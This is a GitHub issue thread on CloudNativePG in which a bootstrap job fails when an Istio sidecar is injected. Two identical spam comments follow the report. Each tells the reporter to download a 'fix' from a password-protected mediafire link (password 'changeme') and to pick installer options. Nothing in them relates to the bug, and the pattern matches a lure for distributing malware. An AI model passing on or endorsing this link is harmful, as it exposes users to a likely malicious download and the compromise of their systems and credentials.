### ISSUE TITLE
[Bug]: Bootstrap job failed while istio sidecar inject in 

### ISSUE THREAD

**Issue by litaocdl** [cloudnative-pg/cloudnative-pg#5382]
### Is there an existing issue already for this bug?

- [X] I have searched for an existing issue, and could not find anything. I believe this is a new bug.

### I have read the troubleshooting guide

- [X] I have read the troubleshooting guide and I think this is a new bug.

### I am running a supported version of CloudNativePG

- [X] I have read the troubleshooting guide and I think this is a new bug.

### Version

1.23.4

### What version of Kubernetes are you using?

1.31

### What is your Kubernetes environment?

Self-managed: kind (evaluation)

### How did you install the operator?

YAML manifest

### What happened?

This probably because we have quite short time configured for retry and waiting  of api server, and while istio sidecar stop the network in bootstrap job pod  [cloudnative-pg/pkg/management/client.go at main · cloudnative-pg/cloudnative-pg](https://github.com/cloudnative-pg/cloudnative-pg/blob/main/pkg/management/client.go#L50)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
